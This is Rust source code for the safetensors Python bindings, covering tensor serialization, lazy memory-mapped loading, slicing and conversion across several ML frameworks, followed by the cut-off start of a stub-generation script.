safetensors::slice::TensorIndexer; use safetensors::tensor::{Dtype, Metadata, SafeTensors, TensorInfo, TensorView}; use safetensors::View; use std::borrow::Cow; use std::collections::HashMap; use std::fs::File; use std::iter::FromIterator; use std::ops::Bound; use std::path::PathBuf; use std::sync::Arc; static TORCH_MODULE: GILOnceCell> = GILOnceCell::new(); static NUMPY_MODULE: GILOnceCell> = GILOnceCell::new(); static TENSORFLOW_MODULE: GILOnceCell> = GILOnceCell::new(); static FLAX_MODULE: GILOnceCell> = GILOnceCell::new(); static MLX_MODULE: GILOnceCell> = GILOnceCell::new(); struct PyView<'a> { shape: Vec, dtype: Dtype, data: PyBound<'a, PyBytes>, data_len: usize, } impl View for &PyView<'_> { fn data(&self) -> std::borrow::Cow<[u8]> { Cow::Borrowed(self.data.as_bytes()) } fn shape(&self) -> &[usize] { &self.shape } fn dtype(&self) -> Dtype { self.dtype } fn data_len(&self) -> usize { self.data_len } } fn prepare(tensor_dict: HashMap>) -> PyResult> { let mut tensors = HashMap::with_capacity(tensor_dict.len()); for (tensor_name, tensor_desc) in &tensor_dict { let shape: Vec = tensor_desc .get_item("shape")? .ok_or_else(|| SafetensorError::new_err(format!("Missing `shape` in {tensor_desc:?}")))? .extract()?; let pydata: PyBound = tensor_desc.get_item("data")?.ok_or_else(|| { SafetensorError::new_err(format!("Missing `data` in {tensor_desc:?}")) })?; // Make sure it's extractable first. let data: &[u8] = pydata.extract()?; let data_len = data.len(); let data: PyBound = pydata.extract()?; let pydtype = tensor_desc.get_item("dtype")?.ok_or_else(|| { SafetensorError::new_err(format!("Missing `dtype` in {tensor_desc:?}")) })?; let dtype: String = pydtype.extract()?; let dtype = match dtype.as_ref() { "bool" => Dtype::BOOL, "int8" => Dtype::I8, "uint8" => Dtype::U8, "int16" => Dtype::I16, "uint16" => Dtype::U16, "int32" => Dtype::I32, "uint32" => Dtype::U32, "int64" => Dtype::I64, "uint64" => Dtype::U64, "float16" => Dtype::F16, "float32" => Dtype::F32, "float64" => Dtype::F64, "bfloat16" => Dtype::BF16, "float8_e4m3fn" => Dtype::F8_E4M3, "float8_e5m2" => Dtype::F8_E5M2, dtype_str => { return Err(SafetensorError::new_err(format!( "dtype {dtype_str} is not covered", ))); } }; let tensor = PyView { shape, dtype, data, data_len, }; tensors.insert(tensor_name.to_string(), tensor); } Ok(tensors) } /// Serializes raw data. /// /// Args: /// tensor_dict (`Dict[str, Dict[Any]]`): /// The tensor dict is like: /// {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} /// metadata (`Dict[str, str]`, *optional*): /// The optional purely text annotations /// /// Returns: /// (`bytes`): /// The serialized content. #[pyfunction] #[pyo3(signature = (tensor_dict, metadata=None))] fn serialize<'b>( py: Python<'b>, tensor_dict: HashMap>, metadata: Option>, ) -> PyResult> { let tensors = prepare(tensor_dict)?; let metadata_map = metadata.map(HashMap::from_iter); let out = safetensors::tensor::serialize(&tensors, &metadata_map) .map_err(|e| SafetensorError::new_err(format!("Error while serializing: {e:?}")))?; let pybytes = PyBytes::new(py, &out); Ok(pybytes) } /// Serializes raw data. /// /// Args: /// tensor_dict (`Dict[str, Dict[Any]]`): /// The tensor dict is like: /// {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} /// filename (`str`, or `os.PathLike`): /// The name of the file to write into. /// metadata (`Dict[str, str]`, *optional*): /// The optional purely text annotations /// /// Returns: /// (`bytes`): /// The serialized content. #[pyfunction] #[pyo3(signature = (tensor_dict, filename, metadata=None))] fn serialize_file( tensor_dict: HashMap>, filename: PathBuf, metadata: Option>, ) -> PyResult<()> { let tensors = prepare(tensor_dict)?; safetensors::tensor::serialize_to_file(&tensors, &metadata, filename.as_path()) .map_err(|e| SafetensorError::new_err(format!("Error while serializing: {e:?}")))?; Ok(()) } /// Opens a safetensors lazily and returns tensors as asked /// /// Args: /// data (`bytes`): /// The byte content of a file /// /// Returns: /// (`List[str, Dict[str, Dict[str, any]]]`): /// The deserialized content is like: /// [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] #[pyfunction] #[pyo3(signature = (bytes))] fn deserialize(py: Python, bytes: &[u8]) -> PyResult)>> { let safetensor = SafeTensors::deserialize(bytes) .map_err(|e| SafetensorError::new_err(format!("Error while deserializing: {e:?}")))?; let tensors = safetensor.tensors(); let mut items = Vec::with_capacity(tensors.len()); for (tensor_name, tensor) in tensors { let pyshape: PyObject = PyList::new(py, tensor.shape().iter())?.into(); let pydtype: PyObject = format!("{:?}", tensor.dtype()).into_pyobject(py)?.into(); let pydata: PyObject = PyByteArray::new(py, tensor.data()).into(); let map = HashMap::from([ ("shape".to_string(), pyshape), ("dtype".to_string(), pydtype), ("data".to_string(), pydata), ]); items.push((tensor_name, map)); } Ok(items) } fn slice_to_indexer( (dim_idx, (slice_index, dim)): (usize, (SliceIndex, usize)), ) -> Result { match slice_index { SliceIndex::Slice(slice) => { let py_start = slice.getattr(intern!(slice.py(), "start"))?; let start: Option = py_start.extract()?; let start = if let Some(start) = start { Bound::Included(start) } else { Bound::Unbounded }; let py_stop = slice.getattr(intern!(slice.py(), "stop"))?; let stop: Option = py_stop.extract()?; let stop = if let Some(stop) = stop { Bound::Excluded(stop) } else { Bound::Unbounded }; Ok(TensorIndexer::Narrow(start, stop)) } SliceIndex::Index(idx) => { if idx < 0 { let idx = dim .checked_add_signed(idx as isize) .ok_or(SafetensorError::new_err(format!( "Invalid index {idx} for dimension {dim_idx} of size {dim}" )))?; Ok(TensorIndexer::Select(idx)) } else { Ok(TensorIndexer::Select(idx as usize)) } } } } #[derive(Debug, Clone, PartialEq, Eq)] enum Framework { Pytorch, Numpy, Tensorflow, Flax, Mlx, } impl<'source> FromPyObject<'source> for Framework { fn extract_bound(ob: &PyBound<'source, PyAny>) -> PyResult { let name: String = ob.extract()?; match &name[..] { "pt" => Ok(Framework::Pytorch), "torch" => Ok(Framework::Pytorch), "pytorch" => Ok(Framework::Pytorch), "np" => Ok(Framework::Numpy), "numpy" => Ok(Framework::Numpy), "tf" => Ok(Framework::Tensorflow), "tensorflow" => Ok(Framework::Tensorflow), "jax" => Ok(Framework::Flax), "flax" => Ok(Framework::Flax), "mlx" => Ok(Framework::Mlx), name => Err(SafetensorError::new_err(format!( "framework {name} is invalid" ))), } } } #[derive(Debug, Clone, PartialEq, Eq)] enum Device { Cpu, Cuda(usize), Mps, Npu(usize), Xpu(usize), Xla(usize), Mlu(usize), /// User didn't specify acceletor, torch /// is responsible for choosing. Anonymous(usize), } /// Parsing the device index. fn parse_device(name: &str) -> PyResult { let tokens: Vec<_> = name.split(':').collect(); if tokens.len() == 2 { let device: usize = tokens[1].parse()?; Ok(device) } else { Err(SafetensorError::new_err(format!( "device {name} is invalid" ))) } } impl<'source> FromPyObject<'source> for Device { fn extract_bound(ob: &PyBound<'source, PyAny>) -> PyResult { if let Ok(name) = ob.extract::() { match &name[..] { "cpu" => Ok(Device::Cpu), "cuda" => Ok(Device::Cuda(0)), "mps" => Ok(Device::Mps), "npu" => Ok(Device::Npu(0)), "xpu" => Ok(Device::Xpu(0)), "xla" => Ok(Device::Xla(0)), "mlu" => Ok(Device::Mlu(0)), name if name.starts_with("cuda:") => parse_device(name).map(Device::Cuda), name if name.starts_with("npu:") => parse_device(name).map(Device::Npu), name if name.starts_with("xpu:") => parse_device(name).map(Device::Xpu), name if name.starts_with("xla:") => parse_device(name).map(Device::Xla), name if name.starts_with("mlu:") => parse_device(name).map(Device::Mlu), name => Err(SafetensorError::new_err(format!( "device {name} is invalid" ))), } } else if let Ok(number) = ob.extract::() { Ok(Device::Anonymous(number)) } else { Err(SafetensorError::new_err(format!("device {ob} is invalid"))) } } } impl<'py> IntoPyObject<'py> for Device { type Target = PyAny; type Output = pyo3::Bound<'py, Self::Target>; type Error = std::convert::Infallible; fn into_pyobject(self, py: Python<'py>) -> Result { match self { Device::Cpu => "cpu".into_pyobject(py).map(|x| x.into_any()), Device::Cuda(n) => format!("cuda:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Mps => "mps".into_pyobject(py).map(|x| x.into_any()), Device::Npu(n) => format!("npu:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Xpu(n) => format!("xpu:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Xla(n) => format!("xla:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Mlu(n) => format!("mlu:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Anonymous(n) => n.into_pyobject(py).map(|x| x.into_any()), } } } enum Storage { Mmap(Mmap), /// Torch specific mmap /// This allows us to not manage it /// so Pytorch can handle the whole lifecycle. /// https://pytorch.org/docs/stable/storage.html#torch.TypedStorage.from_file. TorchStorage(GILOnceCell), } #[derive(Debug, PartialEq, Eq, PartialOrd)] struct Version { major: u8, minor: u8, patch: u8, } impl Version { fn new(major: u8, minor: u8, patch: u8) -> Self { Self { major, minor, patch, } } fn from_string(string: &str) -> Result { let mut parts = string.split('.'); let err = || format!("Could not parse torch package version {string}."); let major_str = parts.next().ok_or_else(err)?; let minor_str = parts.next().ok_or_else(err)?; let patch_str = parts.next().ok_or_else(err)?; // Patch is more complex and can be: // - `1` a number // - `1a0`, `1b0`, `1rc1` an alpha, beta, release candidate version // - `1a0+git2323` from source with commit number let patch_str: String = patch_str .chars() .take_while(|c| c.is_ascii_digit()) .collect(); let major = major_str.parse().map_err(|_| err())?; let minor = minor_str.parse().map_err(|_| err())?; let patch = patch_str.parse().map_err(|_| err())?; Ok(Version { major, minor, patch, }) } } struct Open { metadata: Metadata, offset: usize, framework: Framework, device: Device, storage: Arc, } impl Open { fn new(filename: PathBuf, framework: Framework, device: Option) -> PyResult { let file = File::open(&filename).map_err(|_| { PyFileNotFoundError::new_err(format!("No such file or directory: {filename:?}")) })?; let device = device.unwrap_or(Device::Cpu); if device != Device::Cpu && framework != Framework::Pytorch { return Err(SafetensorError::new_err(format!( "Device {device:?} is not support for framework {framework:?}", ))); } // SAFETY: Mmap is used to prevent allocating in Rust // before making a copy within Python. let buffer = unsafe { MmapOptions::new().map_copy_read_only(&file)? }; let (n, metadata) = SafeTensors::read_metadata(&buffer).map_err(|e| { SafetensorError::new_err(format!("Error while deserializing header: {e:?}")) })?; let offset = n + 8; Python::with_gil(|py| -> PyResult<()> { match framework { Framework::Pytorch => { let module = PyModule::import(py, intern!(py, "torch"))?; TORCH_MODULE.get_or_init(py, || module.into()) } _ => { let module = PyModule::import(py, intern!(py, "numpy"))?; NUMPY_MODULE.get_or_init(py, || module.into()) } }; Ok(()) })?; let storage = match &framework { Framework::Pytorch => Python::with_gil(|py| -> PyResult { let module = get_module(py, &TORCH_MODULE)?; let version: String = module.getattr(intern!(py, "__version__"))?.extract()?; let version = Version::from_string(&version).map_err(SafetensorError::new_err)?; // Untyped storage only exists for versions over 1.11.0 // Same for torch.asarray which is necessary for zero-copy tensor if version >= Version::new(1, 11, 0) { // storage = torch.ByteStorage.from_file(filename, shared=False, size=size).untyped() let py_filename: PyObject = filename.into_pyobject(py)?.into(); let size: PyObject = buffer.len().into_pyobject(py)?.into(); let shared: PyObject = PyBool::new(py, false).to_owned().into(); let (size_name, storage_name) = if version >= Version::new(2, 0, 0) { (intern!(py, "nbytes"), intern!(py, "UntypedStorage")) } else { (intern!(py, "size"), intern!(py, "ByteStorage")) }; let kwargs = [(intern!(py, "shared"), shared), (size_name, size)].into_py_dict(py)?; let storage = module .getattr(storage_name)? // .getattr(intern!(py, "from_file"))? .call_method("from_file", (py_filename,), Some(&kwargs))?; let untyped: PyBound<'_, PyAny> = match storage.getattr(intern!(py, "untyped")) { Ok(untyped) => untyped, Err(_) => storage.getattr(intern!(py, "_untyped"))?, }; let storage = untyped.call0()?.into_pyobject(py)?.into(); let gil_storage = GILOnceCell::new(); gil_storage.get_or_init(py, || storage); Ok(Storage::TorchStorage(gil_storage)) } else { Ok(Storage::Mmap(buffer)) } })?, _ => Storage::Mmap(buffer), }; let storage = Arc::new(storage); Ok(Self { metadata, offset, framework, device, storage, }) } /// Return the special non tensor information in the header /// /// Returns: /// (`Dict[str, str]`): /// The freeform metadata. pub fn metadata(&self) -> Option> { self.metadata.metadata().clone() } /// Returns the names of the tensors in the file. /// /// Returns: /// (`List[str]`): /// The name of the tensors contained in that file pub fn keys(&self) -> PyResult> { let mut keys: Vec = self.metadata.tensors().keys().cloned().collect(); keys.sort(); Ok(keys) } /// Returns a full tensor /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`Tensor`): /// The tensor in the framework you opened the file for. /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor = f.get_tensor("embedding") /// /// ``` pub fn get_tensor(&self, name: &str) -> PyResult { let info = self.metadata.info(name).ok_or_else(|| { SafetensorError::new_err(format!("File does not contain tensor {name}",)) })?; // let info = tensors.get(name).ok_or_else(|| { // SafetensorError::new_err(format!("File does not contain tensor {name}",)) // })?; match &self.storage.as_ref() { Storage::Mmap(mmap) => { let data = &mmap[info.data_offsets.0 + self.offset..info.data_offsets.1 + self.offset]; let array: PyObject = Python::with_gil(|py| PyByteArray::new(py, data).into_any().into()); create_tensor( &self.framework, info.dtype, &info.shape, array, &self.device, ) } Storage::TorchStorage(storage) => { Python::with_gil(|py| -> PyResult { let torch = get_module(py, &TORCH_MODULE)?; let dtype: PyObject = get_pydtype(torch, info.dtype, false)?; let torch_uint8: PyObject = get_pydtype(torch, Dtype::U8, false)?; let kwargs = [(intern!(py, "dtype"), torch_uint8)].into_py_dict(py)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; let shape = info.shape.to_vec(); let shape: PyObject = shape.into_pyobject(py)?.into(); let start = (info.data_offsets.0 + self.offset) as isize; let stop = (info.data_offsets.1 + self.offset) as isize; let slice = PySlice::new(py, start, stop, 1); let storage: &PyObject = storage .get(py) .ok_or_else(|| SafetensorError::new_err("Could not find storage"))?; let storage: &PyBound = storage.bind(py); let storage_slice = storage .getattr(intern!(py, "__getitem__"))? .call1((slice,))?; let sys = PyModule::import(py, intern!(py, "sys"))?; let byteorder: String = sys.getattr(intern!(py, "byteorder"))?.extract()?; let mut tensor = torch .getattr(intern!(py, "asarray"))? .call((storage_slice,), Some(&kwargs))? .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; if byteorder == "big" { let inplace_kwargs = [(intern!(py, "inplace"), PyBool::new(py, false))].into_py_dict(py)?; let intermediary_dtype = match info.dtype { Dtype::BF16 => Some(Dtype::F16), Dtype::F8_E5M2 => Some(Dtype::U8), Dtype::F8_E4M3 => Some(Dtype::U8), _ => None, }; if let Some(intermediary_dtype) = intermediary_dtype { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, intermediary_dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } let numpy = tensor .getattr(intern!(py, "numpy"))? .call0()? .getattr("byteswap")? .call((), Some(&inplace_kwargs))?; tensor = torch.getattr(intern!(py, "from_numpy"))?.call1((numpy,))?; if intermediary_dtype.is_some() { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, info.dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } } tensor = tensor.getattr(intern!(py, "reshape"))?.call1((shape,))?; if self.device != Device::Cpu { let device: PyObject = self.device.clone().into_pyobject(py)?.into(); let kwargs = PyDict::new(py); tensor = tensor.call_method("to", (device,), Some(&kwargs))?; } Ok(tensor.into_pyobject(py)?.into()) // torch.asarray(storage[start + n : stop + n], dtype=torch.uint8).view(dtype=dtype).reshape(shape) }) } } } /// Returns a full slice view object /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`PySafeSlice`): /// A dummy object you can slice into to get a real tensor /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor_part = f.get_slice("embedding")[:, ::8] /// /// ``` pub fn get_slice(&self, name: &str) -> PyResult { if let Some(&info) = self.metadata.tensors().get(name) { Ok(PySafeSlice { info: info.clone(), framework: self.framework.clone(), offset: self.offset, device: self.device.clone(), storage: self.storage.clone(), }) } else { Err(SafetensorError::new_err(format!( "File does not contain tensor {name}", ))) } } } /// Opens a safetensors lazily and returns tensors as asked /// /// Args: /// filename (`str`, or `os.PathLike`): /// The filename to open /// /// framework (`str`): /// The framework you want you tensors in. Supported values: /// `pt`, `tf`, `flax`, `numpy`. /// /// device (`str`, defaults to `"cpu"`): /// The device on which you want the tensors. #[pyclass] #[allow(non_camel_case_types)] struct safe_open { inner: Option, } impl safe_open { fn inner(&self) -> PyResult<&Open> { let inner = self .inner .as_ref() .ok_or_else(|| SafetensorError::new_err("File is closed".to_string()))?; Ok(inner) } } #[pymethods] impl safe_open { #[new] #[pyo3(signature = (filename, framework, device=Some(Device::Cpu)))] fn new(filename: PathBuf, framework: Framework, device: Option) -> PyResult { let inner = Some(Open::new(filename, framework, device)?); Ok(Self { inner }) } /// Return the special non tensor information in the header /// /// Returns: /// (`Dict[str, str]`): /// The freeform metadata. pub fn metadata(&self) -> PyResult>> { Ok(self.inner()?.metadata()) } /// Returns the names of the tensors in the file. /// /// Returns: /// (`List[str]`): /// The name of the tensors contained in that file pub fn keys(&self) -> PyResult> { self.inner()?.keys() } /// Returns a full tensor /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`Tensor`): /// The tensor in the framework you opened the file for. /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor = f.get_tensor("embedding") /// /// ``` pub fn get_tensor(&self, name: &str) -> PyResult { self.inner()?.get_tensor(name) } /// Returns a full slice view object /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`PySafeSlice`): /// A dummy object you can slice into to get a real tensor /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor_part = f.get_slice("embedding")[:, ::8] /// /// ``` pub fn get_slice(&self, name: &str) -> PyResult { self.inner()?.get_slice(name) } /// Start the context manager pub fn __enter__(slf: Py) -> Py { slf } /// Exits the context manager pub fn __exit__(&mut self, _exc_type: PyObject, _exc_value: PyObject, _traceback: PyObject) { self.inner = None; } } #[pyclass] struct PySafeSlice { info: TensorInfo, framework: Framework, offset: usize, device: Device, storage: Arc, } #[derive(FromPyObject)] enum SliceIndex<'a> { Slice(PyBound<'a, PySlice>), Index(i32), } #[derive(FromPyObject)] enum Slice<'a> { Slice(SliceIndex<'a>), Slices(Vec>), } use std::fmt; struct Disp(Vec); /// Should be more readable that the standard /// `Debug` impl fmt::Display for Disp { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "[")?; for item in &self.0 { write!(f, "{item}")?; } write!(f, "]") } } #[pymethods] impl PySafeSlice { /// Returns the shape of the full underlying tensor /// /// Returns: /// (`List[int]`): /// The shape of the full tensor /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tslice = f.get_slice("embedding") /// shape = tslice.get_shape() /// dim = shape // 8 /// tensor = tslice[:, :dim] /// ``` pub fn get_shape(&self, py: Python) -> PyResult { let shape = self.info.shape.clone(); let shape: PyObject = shape.into_pyobject(py)?.into(); Ok(shape) } /// Returns the dtype of the full underlying tensor /// /// Returns: /// (`str`): /// The dtype of the full tensor /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tslice = f.get_slice("embedding") /// dtype = tslice.get_dtype() # "F32" /// ``` pub fn get_dtype(&self, py: Python) -> PyResult { let dtype = self.info.dtype; let dtype: PyObject = format!("{:?}", dtype).into_pyobject(py)?.into(); Ok(dtype) } pub fn __getitem__(&self, slices: &PyBound<'_, PyAny>) -> PyResult { match &self.storage.as_ref() { Storage::Mmap(mmap) => { let pyslices = slices; let slices: Slice = pyslices.extract()?; let is_list = pyslices.is_instance_of::(); let slices: Vec = match slices { Slice::Slice(slice) => vec![slice], Slice::Slices(slices) => { if slices.is_empty() && is_list { vec![SliceIndex::Slice(PySlice::new(pyslices.py(), 0, 0, 0))] } else if is_list { return Err(SafetensorError::new_err( "Non empty lists are not implemented", )); } else { slices } } }; let data = &mmap[self.info.data_offsets.0 + self.offset ..self.info.data_offsets.1 + self.offset]; let shape = self.info.shape.clone(); let tensor = TensorView::new(self.info.dtype, self.info.shape.clone(), data) .map_err(|e| { SafetensorError::new_err(format!("Error preparing tensor view: {e:?}")) })?; let slices: Vec = slices .into_iter() .zip(shape) .enumerate() .map(slice_to_indexer) .collect::>()?; let iterator = tensor.sliced_data(&slices).map_err(|e| { SafetensorError::new_err(format!( "Error during slicing {} with shape {:?}: {:?}", Disp(slices), self.info.shape, e )) })?; let newshape = iterator.newshape(); let mut offset = 0; let length = iterator.remaining_byte_len(); Python::with_gil(|py| { let array: PyObject = PyByteArray::new_with(py, length, |bytes: &mut [u8]| { for slice in iterator { let len = slice.len(); bytes[offset..offset + slice.len()].copy_from_slice(slice); offset += len; } Ok(()) })? .into_any() .into(); create_tensor( &self.framework, self.info.dtype, &newshape, array, &self.device, ) }) } Storage::TorchStorage(storage) => Python::with_gil(|py| -> PyResult { let torch = get_module(py, &TORCH_MODULE)?; let dtype: PyObject = get_pydtype(torch, self.info.dtype, false)?; let torch_uint8: PyObject = get_pydtype(torch, Dtype::U8, false)?; let kwargs = [(intern!(py, "dtype"), torch_uint8)].into_py_dict(py)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; let shape = self.info.shape.to_vec(); let shape: PyObject = shape.into_pyobject(py)?.into(); let start = (self.info.data_offsets.0 + self.offset) as isize; let stop = (self.info.data_offsets.1 + self.offset) as isize; let slice = PySlice::new(py, start, stop, 1); let storage: &PyObject = storage .get(py) .ok_or_else(|| SafetensorError::new_err("Could not find storage"))?; let storage: &PyBound<'_, PyAny> = storage.bind(py); let storage_slice = storage .getattr(intern!(py, "__getitem__"))? .call1((slice,))?; let slices = slices.into_pyobject(py)?; let sys = PyModule::import(py, intern!(py, "sys"))?; let byteorder: String = sys.getattr(intern!(py, "byteorder"))?.extract()?; let mut tensor = torch .getattr(intern!(py, "asarray"))? .call((storage_slice,), Some(&kwargs))? .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; if byteorder == "big" { // Important, do NOT use inplace otherwise the slice itself // is byteswapped, meaning multiple calls will fails let inplace_kwargs = [(intern!(py, "inplace"), PyBool::new(py, false))].into_py_dict(py)?; let intermediary_dtype = match self.info.dtype { Dtype::BF16 => Some(Dtype::F16), Dtype::F8_E5M2 => Some(Dtype::U8), Dtype::F8_E4M3 => Some(Dtype::U8), _ => None, }; if let Some(intermediary_dtype) = intermediary_dtype { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, intermediary_dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } let numpy = tensor .getattr(intern!(py, "numpy"))? .call0()? .getattr("byteswap")? .call((), Some(&inplace_kwargs))?; tensor = torch.getattr(intern!(py, "from_numpy"))?.call1((numpy,))?; if intermediary_dtype.is_some() { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, self.info.dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } } tensor = tensor .getattr(intern!(py, "reshape"))? .call1((shape,))? .getattr(intern!(py, "__getitem__"))? .call1((slices,))?; if self.device != Device::Cpu { let device: PyObject = self.device.clone().into_pyobject(py)?.into(); let kwargs = PyDict::new(py); tensor = tensor.call_method("to", (device,), Some(&kwargs))?; } Ok(tensor.into()) }), } } } fn get_module<'a>( py: Python<'a>, cell: &'static GILOnceCell>, ) -> PyResult<&'a PyBound<'a, PyModule>> { let module: &PyBound<'a, PyModule> = cell .get(py) .ok_or_else(|| SafetensorError::new_err("Could not find module"))? .bind(py); Ok(module) } fn create_tensor<'a>( framework: &'a Framework, dtype: Dtype, shape: &'a [usize], array: PyObject, device: &'a Device, ) -> PyResult { Python::with_gil(|py| -> PyResult { let (module, is_numpy): (&PyBound<'_, PyModule>, bool) = match framework { Framework::Pytorch => ( TORCH_MODULE .get(py) .ok_or_else(|| { SafetensorError::new_err(format!("Could not find module {framework:?}",)) })? .bind(py), false, ), _ => ( NUMPY_MODULE .get(py) .ok_or_else(|| { SafetensorError::new_err(format!("Could not find module {framework:?}",)) })? .bind(py), true, ), }; let dtype: PyObject = get_pydtype(module, dtype, is_numpy)?; let count: usize = shape.iter().product(); let shape = shape.to_vec(); let tensor = if count == 0 { // Torch==1.10 does not allow frombuffer on empty buffers so we create // the tensor manually. // let zeros = module.getattr(intern!(py, "zeros"))?; let shape: PyObject = shape.clone().into_pyobject(py)?.into(); let args = (shape,); let kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; module.call_method("zeros", args, Some(&kwargs))? } else { // let frombuffer = module.getattr(intern!(py, "frombuffer"))?; let kwargs = [ (intern!(py, "buffer"), array), (intern!(py, "dtype"), dtype), ] .into_py_dict(py)?; let mut tensor = module.call_method("frombuffer", (), Some(&kwargs))?; let sys = PyModule::import(py, intern!(py, "sys"))?; let byteorder: String = sys.getattr(intern!(py, "byteorder"))?.extract()?; if byteorder == "big" { let inplace_kwargs = [(intern!(py, "inplace"), PyBool::new(py, false))].into_py_dict(py)?; tensor = tensor .getattr("byteswap")? .call((), Some(&inplace_kwargs))?; } tensor }; let mut tensor: PyBound<'_, PyAny> = tensor.call_method1("reshape", (shape,))?; let tensor = match framework { Framework::Flax => { let module = Python::with_gil(|py| -> PyResult<&Py> { let module = PyModule::import(py, intern!(py, "jax"))?; Ok(FLAX_MODULE.get_or_init(py, || module.into())) })? .bind(py); module .getattr(intern!(py, "numpy"))? .getattr(intern!(py, "array"))? .call1((tensor,))? } Framework::Tensorflow => { let module = Python::with_gil(|py| -> PyResult<&Py> { let module = PyModule::import(py, intern!(py, "tensorflow"))?; Ok(TENSORFLOW_MODULE.get_or_init(py, || module.into())) })? .bind(py); module .getattr(intern!(py, "convert_to_tensor"))? .call1((tensor,))? } Framework::Mlx => { let module = Python::with_gil(|py| -> PyResult<&Py> { let module = PyModule::import(py, intern!(py, "mlx"))?; Ok(MLX_MODULE.get_or_init(py, || module.into())) })? .bind(py); module .getattr(intern!(py, "core"))? // .getattr(intern!(py, "array"))? .call_method1("array", (tensor,))? } Framework::Pytorch => { if device != &Device::Cpu { let device: PyObject = device.clone().into_pyobject(py)?.into(); let kwargs = PyDict::new(py); tensor = tensor.call_method("to", (device,), Some(&kwargs))?; } tensor } Framework::Numpy => tensor, }; // let tensor = tensor.into_py_bound(py); Ok(tensor.into()) }) } fn get_pydtype(module: &PyBound<'_, PyModule>, dtype: Dtype, is_numpy: bool) -> PyResult { Python::with_gil(|py| { let dtype: PyObject = match dtype { Dtype::F64 => module.getattr(intern!(py, "float64"))?.into(), Dtype::F32 => module.getattr(intern!(py, "float32"))?.into(), Dtype::BF16 => { if is_numpy { module .getattr(intern!(py, "dtype"))? .call1(("bfloat16",))? .into() } else { module.getattr(intern!(py, "bfloat16"))?.into() } } Dtype::F16 => module.getattr(intern!(py, "float16"))?.into(), Dtype::U64 => module.getattr(intern!(py, "uint64"))?.into(), Dtype::I64 => module.getattr(intern!(py, "int64"))?.into(), Dtype::U32 => module.getattr(intern!(py, "uint32"))?.into(), Dtype::I32 => module.getattr(intern!(py, "int32"))?.into(), Dtype::U16 => module.getattr(intern!(py, "uint16"))?.into(), Dtype::I16 => module.getattr(intern!(py, "int16"))?.into(), Dtype::U8 => module.getattr(intern!(py, "uint8"))?.into(), Dtype::I8 => module.getattr(intern!(py, "int8"))?.into(), Dtype::BOOL => { if is_numpy { py.import("builtins")?.getattr(intern!(py, "bool"))?.into() } else { module.getattr(intern!(py, "bool"))?.into() } } Dtype::F8_E4M3 => module.getattr(intern!(py, "float8_e4m3fn"))?.into(), Dtype::F8_E5M2 => module.getattr(intern!(py, "float8_e5m2"))?.into(), dtype => { return Err(SafetensorError::new_err(format!( "Dtype not understood: {dtype:?}" ))) } }; Ok(dtype) }) } pyo3::create_exception!( safetensors_rust, SafetensorError, PyException, "Custom Python Exception for Safetensor errors." ); /// A Python module implemented in Rust. #[pymodule] fn _safetensors_rust(m: &PyBound<'_, PyModule>) -> PyResult<()> { m.add_function(wrap_pyfunction!(serialize, m)?)?; m.add_function(wrap_pyfunction!(serialize_file, m)?)?; m.add_function(wrap_pyfunction!(deserialize, m)?)?; m.add_class::()?; m.add("SafetensorError", m.py().get_type::())?; m.add("__version__", env!("CARGO_PKG_VERSION"))?; Ok(()) } #[cfg(test)] mod tests { use super::*; #[test] fn version_parse() { let torch_version = "1.1.1"; let version = Version::from_string(torch_version).unwrap(); assert_eq!(version, Version::new(1, 1, 1)); let torch_version = "2.0.0a0+gitd1123c9"; let version = Version::from_string(torch_version).unwrap(); assert_eq!(version, Version::new(2, 0, 0)); let torch_version = "something"; let version = Version::from_string(torch_version); assert!(version.is_err()); } } safetensors-0.5.2/bindings/python/stub.py000066400000000000000000000127541473753372300205460ustar00rootroot00000000000000import argparse import inspect import os import black INDENT = " " * 4 GENERATED_COMMENT = "# Generated content DO NOT EDIT\n" def do_indent(text: str, indent: str): return text.replace("\n", 